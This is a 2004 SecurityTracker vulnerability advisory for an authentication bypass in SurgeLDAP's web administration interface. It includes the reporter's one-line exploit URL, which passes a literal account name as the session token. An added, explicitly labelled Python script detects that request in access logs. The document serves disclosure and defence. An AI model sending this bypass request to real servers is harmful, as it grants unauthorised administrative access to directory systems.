SecurityTracker.com
Category:   Application (Directory)  >   SurgeLDAP
Vendors:   NetWin
SurgeLDAP Web Administration Interface Authentication Flaw Lets Remote Users Gain Access
SecurityTracker Alert ID:  1010068
SecurityTracker URL:  http://securitytracker.com/id/1010068
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 5 2004
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 1.0g (Build 12)
Description:   Ziv Kamir of Global Security Solution IT reported an authentication vulnerability in SurgeLDAP. A remote user can gain access to the web-based administration interface.

It is reported that a remote user can bypass authentication on the web administration interface by requesting a URL of the following form:

http://127.0.0.1:6680/admin.cgi?cmd=show&page=main.tpl&utoken=manager
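The advisory gives only the request shape, so a defender's first question is how to spot it in web server logs. The following Python script is an added example, not part of the SecurityTracker entry or the original advisory: it parses Common Log Format lines and flags requests to admin.cgi whose utoken parameter is a literal account name (the advisory's `manager`) rather than an opaque session token. The sample log lines, the IP addresses, the 12-hex-character token and the SUSPECT_TOKENS list are all constructed for this illustration; the real SurgeLDAP token format is not documented on this page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (Common Log Format); not taken from the advisory.
# Line 1 mirrors the advisory's bypass URL; line 4 shows a post-login request
# carrying an opaque token (format assumed for illustration).
SAMPLE_LOG = """\
10.0.0.5 - - [05/May/2004:10:01:12 +0000] "GET /admin.cgi?cmd=show&page=main.tpl&utoken=manager HTTP/1.0" 200 4120
10.0.0.7 - - [05/May/2004:10:02:40 +0000] "GET /admin.cgi?cmd=login HTTP/1.0" 200 812
10.0.0.7 - - [05/May/2004:10:02:58 +0000] "POST /admin.cgi HTTP/1.0" 302 0
10.0.0.7 - - [05/May/2004:10:03:01 +0000] "GET /admin.cgi?cmd=show&page=main.tpl&utoken=7f3a9c1e5b2d HTTP/1.0" 200 4120
10.0.0.9 - - [05/May/2004:10:05:00 +0000] "GET /index.html HTTP/1.0" 200 1500
"""

# Common Log Format: client, identd, user, [timestamp], "METHOD target PROTO", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Account names that should never be accepted as a session token.
# "manager" comes from the advisory; the others are assumed additions.
SUSPECT_TOKENS = {"manager", "admin", "administrator", "root"}

# The administration CGI named in the advisory.
ADMIN_PATH = "/admin.cgi"


def parse_line(line):
    """Parse one CLF line into a dict with the path and query split out.

    Returns None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # Keep only the first value of each query parameter.
    entry["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return entry


def is_bypass_attempt(entry):
    """True when the request targets admin.cgi with a literal account name as utoken."""
    if entry["path"] != ADMIN_PATH:
        return False
    token = entry["query"].get("utoken")
    if token is None:
        return False
    return token.lower() in SUSPECT_TOKENS


def find_bypass_attempts(log_text):
    """Return (client, timestamp, utoken, status) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is not None and is_bypass_attempt(entry):
            hits.append((entry["ip"], entry["ts"], entry["query"]["utoken"], entry["status"]))
    return hits


if __name__ == "__main__":
    for ip, ts, token, status in find_bypass_attempts(SAMPLE_LOG):
        print(f"{ts} {ip} admin.cgi utoken={token!r} -> HTTP {status}")
```

A flagged request answered with HTTP 200 means the interface served an administration page to a client that presented no server-issued token, which is exactly the condition the advisory describes. The same check can be run over historical logs to establish whether the interface was reached this way before the vendor fix of May 11 2004 was applied.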

The vendor was reportedly notified on March 28, 2004.

Impact:   A remote user can bypass the authentication process and gain access to the web administration interface.
Solution:   No solution was available at the time of this entry.
Vendor URL:  netwinsite.com/surgeldap/
Cause:   Authentication error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 11 2004 (Vendor Issues Fix) SurgeLDAP Web Administration Interface Authentication Flaw Lets Remote Users Gain Access
The vendor has issued a fix.



 Source Message Contents

Subject:  Vulnerability Under SurgeLdap


Attachment: Surge.txt

05/05/04


====================================
 GSSIT - Global Security Solution IT
====================================		

-------------------------------------------------------

Application:    SurgeLdap Server 
Web Site   :    http://netwinsite.com/surgeldap/surgeldap.htm
Versions   :    v1.0g (Build 12)
Platform   :    Windows 
Bug        :    Bypass the Admin Web Interface authentication

             
                           
Credits:
########

#########################################
#         ==  Ziv Kamir ==              #
#                                       #
# GSSIT - Global Security Solution IT   #                   
#                                       #
#     Email : gss_it@yahoo.com          #
#                                       #
#                                       #
#########################################

---------------------

1) Introduction
2) Bug
3) The Code
4) Fix


================
1) Introduction
================

SurgeLDAP is the fastest, full-featured ldap server on the market today.

SurgeLDAP is an advanced, easy-to-manage and easy-to-install, high-performance LDAP v3 server. It supports any number of schemas, easy adding and modifying of existing schemas, integrated web-based user access, fast browser-based administration tools, and all relevant RFC protocols: LDAP v2, LDAP v3, HTTP.



=======
2) Bug
=======

Bypass the Admin Web Interface authentication


===========
3) The Code
===========


http://127.0.0.1:6680/admin.cgi?cmd=show&page=main.tpl&utoken=manager


======
4) Fix
======

Date of Vendor Notification:
----------------------------

28 Mar 2004 



==============================================================================================

                 *** The Data is for educational purpose only. *** 

          The information in this bulletin is provided "AS IS" without 
          warranty of any kind. In no event shall we be liable for any 
          damages whatsoever including direct, indirect, incidental, 
          consequential, loss of business profits or special damages. 

==============================================================================================


Copyright 2022, SecurityGlobal.net LLC